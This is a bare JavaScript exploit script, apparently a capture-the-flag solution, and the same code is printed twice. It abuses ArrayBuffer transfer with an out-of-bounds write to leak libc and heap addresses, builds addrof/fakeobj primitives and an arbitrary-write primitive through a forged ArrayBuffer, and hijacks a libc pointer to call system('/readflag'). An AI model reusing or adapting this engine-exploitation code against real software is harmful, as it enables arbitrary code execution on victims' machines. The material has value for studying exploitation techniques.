po6ix/exp.js

## exp.js
refs = new Array(0x100);

// chunk consumer
for (let i = 0; i < 0x20; ++i) {
    refs.push(new ArrayBuffer(0x200));
    refs.push(new Array(0x130));
    refs.push(new Array(0x40));
}

// libc leak
{
    let leak_chunk1 = new ArrayBuffer(0x200);
    let leak_chunk2 = new ArrayBuffer(0x200);
    let leak_chunk3 = new ArrayBuffer(0x3df0);
    let leak_chunk3_bi = new BigUint64Array(leak_chunk3);
    let leak_chunk3_guard = new ArrayBuffer(0x200);

    let oob_ab = new ArrayBuffer(0x210);
    let oob_bi = new BigUint64Array(oob_ab);
    oob_bi[64] = 0x0n;
    oob_bi[65] = 0x4011n;

    leak_chunk1.transfer();
    oob_ab.transferToFixedLength(0x200);
    leak_chunk2.transfer();

    arr = new Array(0x40);
    arr[0] = 1.1;

    libc_leak = leak_chunk3_bi[0]; // +0x11abd00
    console.log(`libc_leak: 0x${libc_leak.toString(16)}`)
}

{
    let chunk1 = new ArrayBuffer(0x200);
    let chunk2 = new ArrayBuffer(0x200);
    let chunk3 = new ArrayBuffer(0x200);
    let chunk3_bi = new BigUint64Array(chunk3);
    let chunk4 = new ArrayBuffer(0x8000);
    let chunk4_bi = new BigUint64Array(chunk4);
    let command_buffer = new ArrayBuffer(0x400);
    let command_buffer_bi = new BigUint64Array(command_buffer);

    let oob_ab = new ArrayBuffer(0x210);
    let oob_bi = new BigUint64Array(oob_ab);
    oob_bi[64] = 0x0n;
    oob_bi[65] = 0x421n;

    chunk1.transfer();
    oob_ab.transferToFixedLength(0x200);
    chunk2.transfer();

    let arr = new Array(130);
    arr[66] = 13.37;

    function addrof(o) {
        arr[66] = o;
        return chunk3_bi[0] & 0xffffffffffffn;
    }

    heap_leak = addrof(refs);
    heap_base = heap_leak - 0x82f00n;
    fake_ab_addr = heap_base + 0xfd010n;

    console.log(`heap_leak: 0x${heap_leak.toString(16)}`);
    console.log(`heap_base: 0x${heap_base.toString(16)}`);
    console.log(`fake_ab_addr: 0x${fake_ab_addr.toString(16)}`);

    arraybuffer_vtable = libc_leak + 0xa3a0a8n;
    arraybuffer_prototype = heap_base + 0x83680n;

    console.log(`arraybuffer_vtable: 0x${arraybuffer_vtable.toString(16)}`);
    console.log(`arraybuffer_prototype: 0x${arraybuffer_prototype.toString(16)}`);

    chunk4_bi[0x800-2] = heap_base + 0x000000000001a370n;
    chunk4_bi[0x800+0] = arraybuffer_vtable; // vtable
    chunk4_bi[0x800+1] = 0x1000n; // length
    chunk4_bi[0x800+2] = arraybuffer_prototype; // prototype
    chunk4_bi[0x800+12] = 0x1000n; // byteLength
    chunk4_bi[0x800+14] = 0x1n; // isAttached

    function fakeobj(addr) {
        chunk3_bi[0] = addr | 0xfff9000000000000n;
        return arr[66];
    }

    let fake_ab = fakeobj(fake_ab_addr);
    let fake_ab_bi = new BigUint64Array(fake_ab);

    function write64(addr, value) {
        chunk4_bi[0x808] = addr;
        fake_ab_bi[0] = value;
    }

    command_buffer_bi[0] = 0x616c66646165722fn;
    command_buffer_bi[1] = 0x67n;

    // system("/readflag")
    write64(libc_leak + 0xa57720n, libc_leak - 0x208ad0n);
    command_buffer.transfer();

    while(1);
}
	refs = new Array(0x100);

	// chunk consumer
	for (let i = 0; i < 0x20; ++i) {
	refs.push(new ArrayBuffer(0x200));
	refs.push(new Array(0x130));
	refs.push(new Array(0x40));
	}

	// libc leak
	{
	let leak_chunk1 = new ArrayBuffer(0x200);
	let leak_chunk2 = new ArrayBuffer(0x200);
	let leak_chunk3 = new ArrayBuffer(0x3df0);
	let leak_chunk3_bi = new BigUint64Array(leak_chunk3);
	let leak_chunk3_guard = new ArrayBuffer(0x200);

	let oob_ab = new ArrayBuffer(0x210);
	let oob_bi = new BigUint64Array(oob_ab);
	oob_bi[64] = 0x0n;
	oob_bi[65] = 0x4011n;

	leak_chunk1.transfer();
	oob_ab.transferToFixedLength(0x200);
	leak_chunk2.transfer();

	arr = new Array(0x40);
	arr[0] = 1.1;

	libc_leak = leak_chunk3_bi[0]; // +0x11abd00
	console.log(`libc_leak: 0x${libc_leak.toString(16)}`)
	}

	{
	let chunk1 = new ArrayBuffer(0x200);
	let chunk2 = new ArrayBuffer(0x200);
	let chunk3 = new ArrayBuffer(0x200);
	let chunk3_bi = new BigUint64Array(chunk3);
	let chunk4 = new ArrayBuffer(0x8000);
	let chunk4_bi = new BigUint64Array(chunk4);
	let command_buffer = new ArrayBuffer(0x400);
	let command_buffer_bi = new BigUint64Array(command_buffer);

	let oob_ab = new ArrayBuffer(0x210);
	let oob_bi = new BigUint64Array(oob_ab);
	oob_bi[64] = 0x0n;
	oob_bi[65] = 0x421n;

	chunk1.transfer();
	oob_ab.transferToFixedLength(0x200);
	chunk2.transfer();

	let arr = new Array(130);
	arr[66] = 13.37;

	function addrof(o) {
	arr[66] = o;
	return chunk3_bi[0] & 0xffffffffffffn;
	}

	heap_leak = addrof(refs);
	heap_base = heap_leak - 0x82f00n;
	fake_ab_addr = heap_base + 0xfd010n;

	console.log(`heap_leak: 0x${heap_leak.toString(16)}`);
	console.log(`heap_base: 0x${heap_base.toString(16)}`);
	console.log(`fake_ab_addr: 0x${fake_ab_addr.toString(16)}`);

	arraybuffer_vtable = libc_leak + 0xa3a0a8n;
	arraybuffer_prototype = heap_base + 0x83680n;

	console.log(`arraybuffer_vtable: 0x${arraybuffer_vtable.toString(16)}`);
	console.log(`arraybuffer_prototype: 0x${arraybuffer_prototype.toString(16)}`);

	chunk4_bi[0x800-2] = heap_base + 0x000000000001a370n;
	chunk4_bi[0x800+0] = arraybuffer_vtable; // vtable
	chunk4_bi[0x800+1] = 0x1000n; // length
	chunk4_bi[0x800+2] = arraybuffer_prototype; // prototype
	chunk4_bi[0x800+12] = 0x1000n; // byteLength
	chunk4_bi[0x800+14] = 0x1n; // isAttached

	function fakeobj(addr) {
	chunk3_bi[0] = addr \| 0xfff9000000000000n;
	return arr[66];
	}

	let fake_ab = fakeobj(fake_ab_addr);
	let fake_ab_bi = new BigUint64Array(fake_ab);

	function write64(addr, value) {
	chunk4_bi[0x808] = addr;
	fake_ab_bi[0] = value;
	}

	command_buffer_bi[0] = 0x616c66646165722fn;
	command_buffer_bi[1] = 0x67n;

	// system("/readflag")
	write64(libc_leak + 0xa57720n, libc_leak - 0x208ad0n);
	command_buffer.transfer();

	while(1);
	}